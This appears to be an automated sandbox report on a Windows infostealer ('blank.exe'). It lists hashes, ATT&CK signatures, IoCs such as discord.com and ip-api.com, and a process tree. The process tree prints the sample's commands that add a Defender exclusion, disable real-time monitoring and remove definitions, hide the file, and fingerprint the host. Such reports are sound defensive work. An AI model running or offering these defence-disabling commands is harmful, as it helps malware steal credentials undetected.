7690f96c2c52dae73c9d1e941f3f2fea3350664b8074e0958f64cc704c65527b

Analysis

max time kernel
299s
max time network
293s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
01-01-2025 18:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

blank.exe
Size

6.9MB
MD5

feae9beea405e210c9734b7c682a9fb4
SHA1

0a7cc64b5255b58752f81869dc4ef84a95cd8df5
SHA256

7690f96c2c52dae73c9d1e941f3f2fea3350664b8074e0958f64cc704c65527b
SHA512

354524a145d20751455c91d3a7a4ce5cdb40bae220f77fdc199fcbc90c48568ea9b20db72bde694e687d395fa0a66fd61eab5910f4ea2d8fa981462a712a1e1d
SSDEEP

98304:6ADjWM8JEE1FbamaHl3Ne4i3Tf2PkOpfW9hZMMoVmkzhxIdfXeRiYRJJcGhEIFWv:6A0seNTfm/pf+xk4dWRimrbW3jmyh

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
820	powershell.exe
2920	powershell.exe
4824	powershell.exe
3412	powershell.exe
4364	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	blank.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
4488	cmd.exe
3292	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
540	rar.exe

Loads dropped DLL 16 IoCs

pid	Process
3364	blank.exe
3364	blank.exe
3364	blank.exe
3364	blank.exe
3364	blank.exe
3364	blank.exe
3364	blank.exe
3364	blank.exe
3364	blank.exe
3364	blank.exe
3364	blank.exe
3364	blank.exe
3364	blank.exe
3364	blank.exe
3364	blank.exe
3364	blank.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
23	discord.com
24	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
9	ip-api.com
21	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
4356	tasklist.exe
3840	tasklist.exe
1804	tasklist.exe
1464	tasklist.exe
1180	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
4720	cmd.exe

UPX packed file 61 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000a000000023b88-21.dat	upx
behavioral1/memory/3364-25-0x00007FFC733B0000-0x00007FFC73998000-memory.dmp	upx
behavioral1/files/0x000a000000023b7b-27.dat	upx
behavioral1/files/0x000a000000023b86-29.dat	upx
behavioral1/files/0x000a000000023b82-47.dat	upx
behavioral1/memory/3364-48-0x00007FFC88590000-0x00007FFC8859F000-memory.dmp	upx
behavioral1/files/0x000a000000023b81-46.dat	upx
behavioral1/files/0x000a000000023b80-45.dat	upx
behavioral1/files/0x000a000000023b7f-44.dat	upx
behavioral1/files/0x000a000000023b7e-43.dat	upx
behavioral1/files/0x000a000000023b7d-42.dat	upx
behavioral1/files/0x000a000000023b7c-41.dat	upx
behavioral1/files/0x000a000000023b7a-40.dat	upx
behavioral1/files/0x000a000000023b8d-39.dat	upx
behavioral1/files/0x000a000000023b8c-38.dat	upx
behavioral1/files/0x000a000000023b8b-37.dat	upx
behavioral1/files/0x000a000000023b87-34.dat	upx
behavioral1/files/0x000a000000023b85-33.dat	upx
behavioral1/memory/3364-31-0x00007FFC86350000-0x00007FFC86374000-memory.dmp	upx
behavioral1/memory/3364-54-0x00007FFC86320000-0x00007FFC8634D000-memory.dmp	upx
behavioral1/memory/3364-56-0x00007FFC86300000-0x00007FFC86319000-memory.dmp	upx
behavioral1/memory/3364-58-0x00007FFC862D0000-0x00007FFC862F3000-memory.dmp	upx
behavioral1/memory/3364-60-0x00007FFC81EE0000-0x00007FFC82053000-memory.dmp	upx
behavioral1/memory/3364-62-0x00007FFC86180000-0x00007FFC86199000-memory.dmp	upx
behavioral1/memory/3364-64-0x00007FFC862C0000-0x00007FFC862CD000-memory.dmp	upx
behavioral1/memory/3364-66-0x00007FFC733B0000-0x00007FFC73998000-memory.dmp	upx
behavioral1/memory/3364-67-0x00007FFC83820000-0x00007FFC8384E000-memory.dmp	upx
behavioral1/memory/3364-72-0x00007FFC82B90000-0x00007FFC82C48000-memory.dmp	upx
behavioral1/memory/3364-71-0x00007FFC86350000-0x00007FFC86374000-memory.dmp	upx
behavioral1/memory/3364-70-0x00007FFC73030000-0x00007FFC733A5000-memory.dmp	upx
behavioral1/memory/3364-76-0x00007FFC82DD0000-0x00007FFC82DDD000-memory.dmp	upx
behavioral1/memory/3364-75-0x00007FFC82DE0000-0x00007FFC82DF4000-memory.dmp	upx
behavioral1/memory/3364-78-0x00007FFC72AE0000-0x00007FFC72BFC000-memory.dmp	upx
behavioral1/memory/3364-79-0x00007FFC862D0000-0x00007FFC862F3000-memory.dmp	upx
behavioral1/memory/3364-102-0x00007FFC81EE0000-0x00007FFC82053000-memory.dmp	upx
behavioral1/memory/3364-109-0x00007FFC86180000-0x00007FFC86199000-memory.dmp	upx
behavioral1/memory/3364-110-0x00007FFC73030000-0x00007FFC733A5000-memory.dmp	upx
behavioral1/memory/3364-113-0x00007FFC83820000-0x00007FFC8384E000-memory.dmp	upx
behavioral1/memory/3364-182-0x00007FFC82B90000-0x00007FFC82C48000-memory.dmp	upx
behavioral1/memory/3364-274-0x00007FFC733B0000-0x00007FFC73998000-memory.dmp	upx
behavioral1/memory/3364-288-0x00007FFC72AE0000-0x00007FFC72BFC000-memory.dmp	upx
behavioral1/memory/3364-284-0x00007FFC73030000-0x00007FFC733A5000-memory.dmp	upx
behavioral1/memory/3364-283-0x00007FFC83820000-0x00007FFC8384E000-memory.dmp	upx
behavioral1/memory/3364-280-0x00007FFC81EE0000-0x00007FFC82053000-memory.dmp	upx
behavioral1/memory/3364-275-0x00007FFC86350000-0x00007FFC86374000-memory.dmp	upx
behavioral1/memory/3364-327-0x00007FFC733B0000-0x00007FFC73998000-memory.dmp	upx
behavioral1/memory/3364-416-0x00007FFC86350000-0x00007FFC86374000-memory.dmp	upx
behavioral1/memory/3364-427-0x00007FFC82DE0000-0x00007FFC82DF4000-memory.dmp	upx
behavioral1/memory/3364-426-0x00007FFC82DD0000-0x00007FFC82DDD000-memory.dmp	upx
behavioral1/memory/3364-425-0x00007FFC82B90000-0x00007FFC82C48000-memory.dmp	upx
behavioral1/memory/3364-424-0x00007FFC83820000-0x00007FFC8384E000-memory.dmp	upx
behavioral1/memory/3364-423-0x00007FFC862C0000-0x00007FFC862CD000-memory.dmp	upx
behavioral1/memory/3364-422-0x00007FFC86180000-0x00007FFC86199000-memory.dmp	upx
behavioral1/memory/3364-421-0x00007FFC81EE0000-0x00007FFC82053000-memory.dmp	upx
behavioral1/memory/3364-420-0x00007FFC862D0000-0x00007FFC862F3000-memory.dmp	upx
behavioral1/memory/3364-419-0x00007FFC86300000-0x00007FFC86319000-memory.dmp	upx
behavioral1/memory/3364-418-0x00007FFC86320000-0x00007FFC8634D000-memory.dmp	upx
behavioral1/memory/3364-417-0x00007FFC733B0000-0x00007FFC73998000-memory.dmp	upx
behavioral1/memory/3364-415-0x00007FFC88590000-0x00007FFC8859F000-memory.dmp	upx
behavioral1/memory/3364-428-0x00007FFC73030000-0x00007FFC733A5000-memory.dmp	upx
behavioral1/memory/3364-429-0x00007FFC72AE0000-0x00007FFC72BFC000-memory.dmp	upx

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Crashpad\metadata	setup.exe
File opened for modification	C:\Program Files\Crashpad\settings.dat	setup.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
1472	cmd.exe
4060	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
1948	cmd.exe
3936	netsh.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	taskmgr.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
388	WMIC.exe
2288	WMIC.exe
4360	WMIC.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
1748	systeminfo.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133802308796074911"	chrome.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings	taskmgr.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
4060	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2920	powershell.exe
3412	powershell.exe
2920	powershell.exe
3412	powershell.exe
4364	powershell.exe
4364	powershell.exe
3292	powershell.exe
3292	powershell.exe
3292	powershell.exe
5100	powershell.exe
5100	powershell.exe
5100	powershell.exe
4824	powershell.exe
4824	powershell.exe
4336	powershell.exe
4336	powershell.exe
820	powershell.exe
820	powershell.exe
3528	powershell.exe
3528	powershell.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
4968	taskmgr.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 20 IoCs

pid	Process
5052	chrome.exe
5052	chrome.exe
5052	chrome.exe
5052	chrome.exe
5052	chrome.exe
4128	msedge.exe
4128	msedge.exe
4128	msedge.exe
4128	msedge.exe
4128	msedge.exe
4128	msedge.exe
4128	msedge.exe
4128	msedge.exe
4128	msedge.exe
4128	msedge.exe
4128	msedge.exe
4128	msedge.exe
4128	msedge.exe
4128	msedge.exe
4128	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2920	powershell.exe
Token: SeIncreaseQuotaPrivilege	3292	WMIC.exe
Token: SeSecurityPrivilege	3292	WMIC.exe
Token: SeTakeOwnershipPrivilege	3292	WMIC.exe
Token: SeLoadDriverPrivilege	3292	WMIC.exe
Token: SeSystemProfilePrivilege	3292	WMIC.exe
Token: SeSystemtimePrivilege	3292	WMIC.exe
Token: SeProfSingleProcessPrivilege	3292	WMIC.exe
Token: SeIncBasePriorityPrivilege	3292	WMIC.exe
Token: SeCreatePagefilePrivilege	3292	WMIC.exe
Token: SeBackupPrivilege	3292	WMIC.exe
Token: SeRestorePrivilege	3292	WMIC.exe
Token: SeShutdownPrivilege	3292	WMIC.exe
Token: SeDebugPrivilege	3292	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3292	WMIC.exe
Token: SeRemoteShutdownPrivilege	3292	WMIC.exe
Token: SeUndockPrivilege	3292	WMIC.exe
Token: SeManageVolumePrivilege	3292	WMIC.exe
Token: 33	3292	WMIC.exe
Token: 34	3292	WMIC.exe
Token: 35	3292	WMIC.exe
Token: 36	3292	WMIC.exe
Token: SeDebugPrivilege	3412	powershell.exe
Token: SeDebugPrivilege	4356	tasklist.exe
Token: SeIncreaseQuotaPrivilege	3292	WMIC.exe
Token: SeSecurityPrivilege	3292	WMIC.exe
Token: SeTakeOwnershipPrivilege	3292	WMIC.exe
Token: SeLoadDriverPrivilege	3292	WMIC.exe
Token: SeSystemProfilePrivilege	3292	WMIC.exe
Token: SeSystemtimePrivilege	3292	WMIC.exe
Token: SeProfSingleProcessPrivilege	3292	WMIC.exe
Token: SeIncBasePriorityPrivilege	3292	WMIC.exe
Token: SeCreatePagefilePrivilege	3292	WMIC.exe
Token: SeBackupPrivilege	3292	WMIC.exe
Token: SeRestorePrivilege	3292	WMIC.exe
Token: SeShutdownPrivilege	3292	WMIC.exe
Token: SeDebugPrivilege	3292	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3292	WMIC.exe
Token: SeRemoteShutdownPrivilege	3292	WMIC.exe
Token: SeUndockPrivilege	3292	WMIC.exe
Token: SeManageVolumePrivilege	3292	WMIC.exe
Token: 33	3292	WMIC.exe
Token: 34	3292	WMIC.exe
Token: 35	3292	WMIC.exe
Token: 36	3292	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4360	WMIC.exe
Token: SeSecurityPrivilege	4360	WMIC.exe
Token: SeTakeOwnershipPrivilege	4360	WMIC.exe
Token: SeLoadDriverPrivilege	4360	WMIC.exe
Token: SeSystemProfilePrivilege	4360	WMIC.exe
Token: SeSystemtimePrivilege	4360	WMIC.exe
Token: SeProfSingleProcessPrivilege	4360	WMIC.exe
Token: SeIncBasePriorityPrivilege	4360	WMIC.exe
Token: SeCreatePagefilePrivilege	4360	WMIC.exe
Token: SeBackupPrivilege	4360	WMIC.exe
Token: SeRestorePrivilege	4360	WMIC.exe
Token: SeShutdownPrivilege	4360	WMIC.exe
Token: SeDebugPrivilege	4360	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4360	WMIC.exe
Token: SeRemoteShutdownPrivilege	4360	WMIC.exe
Token: SeUndockPrivilege	4360	WMIC.exe
Token: SeManageVolumePrivilege	4360	WMIC.exe
Token: 33	4360	WMIC.exe
Token: 34	4360	WMIC.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe
4968	taskmgr.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2296 wrote to memory of 3364	2296	blank.exe	83
PID 2296 wrote to memory of 3364	2296	blank.exe	83
PID 3364 wrote to memory of 2016	3364	blank.exe	84
PID 3364 wrote to memory of 2016	3364	blank.exe	84
PID 3364 wrote to memory of 5008	3364	blank.exe	85
PID 3364 wrote to memory of 5008	3364	blank.exe	85
PID 3364 wrote to memory of 4776	3364	blank.exe	88
PID 3364 wrote to memory of 4776	3364	blank.exe	88
PID 3364 wrote to memory of 2544	3364	blank.exe	90
PID 3364 wrote to memory of 2544	3364	blank.exe	90
PID 5008 wrote to memory of 2920	5008	cmd.exe	92
PID 5008 wrote to memory of 2920	5008	cmd.exe	92
PID 2016 wrote to memory of 3412	2016	cmd.exe	93
PID 2016 wrote to memory of 3412	2016	cmd.exe	93
PID 2544 wrote to memory of 3292	2544	cmd.exe	94
PID 2544 wrote to memory of 3292	2544	cmd.exe	94
PID 4776 wrote to memory of 4356	4776	cmd.exe	95
PID 4776 wrote to memory of 4356	4776	cmd.exe	95
PID 3364 wrote to memory of 5100	3364	blank.exe	97
PID 3364 wrote to memory of 5100	3364	blank.exe	97
PID 5100 wrote to memory of 3456	5100	cmd.exe	99
PID 5100 wrote to memory of 3456	5100	cmd.exe	99
PID 3364 wrote to memory of 2124	3364	blank.exe	100
PID 3364 wrote to memory of 2124	3364	blank.exe	100
PID 2124 wrote to memory of 1376	2124	cmd.exe	102
PID 2124 wrote to memory of 1376	2124	cmd.exe	102
PID 3364 wrote to memory of 1524	3364	blank.exe	103
PID 3364 wrote to memory of 1524	3364	blank.exe	103
PID 1524 wrote to memory of 4360	1524	cmd.exe	105
PID 1524 wrote to memory of 4360	1524	cmd.exe	105
PID 3364 wrote to memory of 4536	3364	blank.exe	106
PID 3364 wrote to memory of 4536	3364	blank.exe	106
PID 4536 wrote to memory of 388	4536	cmd.exe	108
PID 4536 wrote to memory of 388	4536	cmd.exe	108
PID 3364 wrote to memory of 4720	3364	blank.exe	110
PID 3364 wrote to memory of 4720	3364	blank.exe	110
PID 3364 wrote to memory of 5052	3364	blank.exe	111
PID 3364 wrote to memory of 5052	3364	blank.exe	111
PID 4720 wrote to memory of 2596	4720	cmd.exe	114
PID 4720 wrote to memory of 2596	4720	cmd.exe	114
PID 5052 wrote to memory of 4364	5052	cmd.exe	115
PID 5052 wrote to memory of 4364	5052	cmd.exe	115
PID 3364 wrote to memory of 1332	3364	blank.exe	116
PID 3364 wrote to memory of 1332	3364	blank.exe	116
PID 3364 wrote to memory of 4368	3364	blank.exe	117
PID 3364 wrote to memory of 4368	3364	blank.exe	117
PID 3364 wrote to memory of 4460	3364	blank.exe	120
PID 3364 wrote to memory of 4460	3364	blank.exe	120
PID 1332 wrote to memory of 3840	1332	cmd.exe	122
PID 1332 wrote to memory of 3840	1332	cmd.exe	122
PID 4368 wrote to memory of 1804	4368	cmd.exe	123
PID 4368 wrote to memory of 1804	4368	cmd.exe	123
PID 4460 wrote to memory of 3992	4460	cmd.exe	124
PID 4460 wrote to memory of 3992	4460	cmd.exe	124
PID 3364 wrote to memory of 4816	3364	blank.exe	126
PID 3364 wrote to memory of 4816	3364	blank.exe	126
PID 3364 wrote to memory of 3760	3364	blank.exe	127
PID 3364 wrote to memory of 3760	3364	blank.exe	127
PID 3364 wrote to memory of 4488	3364	blank.exe	125
PID 3364 wrote to memory of 4488	3364	blank.exe	125
PID 4816 wrote to memory of 1464	4816	cmd.exe	131
PID 4816 wrote to memory of 1464	4816	cmd.exe	131
PID 3364 wrote to memory of 1948	3364	blank.exe	132
PID 3364 wrote to memory of 1948	3364	blank.exe	132

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2596	attrib.exe
2788	attrib.exe
3288	attrib.exe

C:\Users\Admin\AppData\Local\Temp\blank.exe
"C:\Users\Admin\AppData\Local\Temp\blank.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2296
- C:\Users\Admin\AppData\Local\Temp\blank.exe
  "C:\Users\Admin\AppData\Local\Temp\blank.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:3364
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\blank.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2016
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\blank.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3412
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5008
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2920
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4776
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4356
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2544
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3292
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5100
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:3456
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2124
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:1376
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1524
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:4360
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4536
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:388
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\blank.exe""
    3⤵
